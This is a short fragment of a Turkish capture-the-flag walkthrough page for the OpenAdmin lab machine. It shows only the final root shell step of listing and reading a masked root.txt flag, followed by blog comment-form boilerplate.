root@openadmin:~# ls
root.txt
root@openadmin:~# cat root.txt 
2f9******************************
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir